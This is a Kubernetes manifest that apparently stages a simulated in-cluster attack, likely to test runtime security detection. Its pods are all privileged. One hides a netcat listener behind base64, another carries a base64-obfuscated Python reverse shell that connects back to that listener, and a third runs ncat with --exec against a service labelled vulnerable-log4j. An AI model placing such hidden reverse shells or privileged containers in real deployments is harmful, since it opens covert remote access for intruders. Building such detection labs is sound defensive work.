---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: my-service
  name: my-service
spec:
  replicas: 1
  selector:
    matchLabels:
      app: my-service
  strategy: {}
  template:
    metadata:
      labels:
        app: my-service
    spec:
      containers:
      - name: my-other-app
        image: nicolaka/netshoot
        imagePullPolicy: IfNotPresent
        command: ["/bin/sh"]
        args: ["-c", "echo bmMgLWx2IDEzMzcgJiBzbGVlcCAzNjAwCg== | base64 -d | sh"]
        ports:
        - containerPort: 1337
        resources:
          limits:
            memory: "100Mi"
            cpu: "100m"
          requests:
            memory: "64Mi"
            cpu: "50m"
        securityContext:
          privileged: true
      - name: vulnerable-log4j
        image: nicolaka/netshoot
        imagePullPolicy: IfNotPresent
        command: ["/bin/bash"]
        args: ["-c", "nc -lvp 8080 & sleep 35"]
        ports:
        - containerPort: 8080
        resources:
          limits:
            memory: "100Mi"
            cpu: "100m"
          requests:
            memory: "64Mi"
            cpu: "50m"
        securityContext:
          privileged: true
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: my-service
  name: my-service
spec:
  ports:
  - port: 1337
    protocol: TCP
    targetPort: 1337
  selector:
    app: my-service
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: vulnerable-log4j
  name: vulnerable-log4j
spec:
  ports:
  - port: 8080
    protocol: TCP
    targetPort: 8080
  selector:
    app: my-service
---
apiVersion: v1
kind: Pod
metadata:
  name: my-malicious
spec:
  containers:
  - name: my-malicious
    image: python:3.9.18-slim
    imagePullPolicy: IfNotPresent
    command: ["/bin/bash"]
    args: ["-c", "echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgibXktc2VydmljZSIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7ZWNobyBJIGZpbmQgeW91ciBsYWNrIG9mIHNlY3VyaXR5IGRpc3R1cmJpbmc7IGV4aXQgMCJdKSc= | base64 -d | sh"]
    resources:
      limits:
        memory: "100Mi"
        cpu: "100m"
      requests:
        memory: "64Mi"
        cpu: "50m"
    securityContext:
      privileged: true
  restartPolicy: OnFailure
---
apiVersion: v1
kind: Pod
metadata:
  name: my-malicious-2
spec:
  containers:
  - name: my-malicious-2
    image: nicolaka/netshoot
    imagePullPolicy: IfNotPresent
    command: ["/bin/bash"]
    args: ["-c", "apk add nmap-ncat; until nc -z vulnerable-log4j 8080; do echo Waiting for connection; sleep 1; done; ncat vulnerable-log4j 8080 --exec \"/bin/echo Attacked\""]
    resources:
      limits:
        memory: "100Mi"
        cpu: "100m"
      requests:
        memory: "64Mi"
        cpu: "50m"
    securityContext:
      privileged: true
  restartPolicy: OnFailure
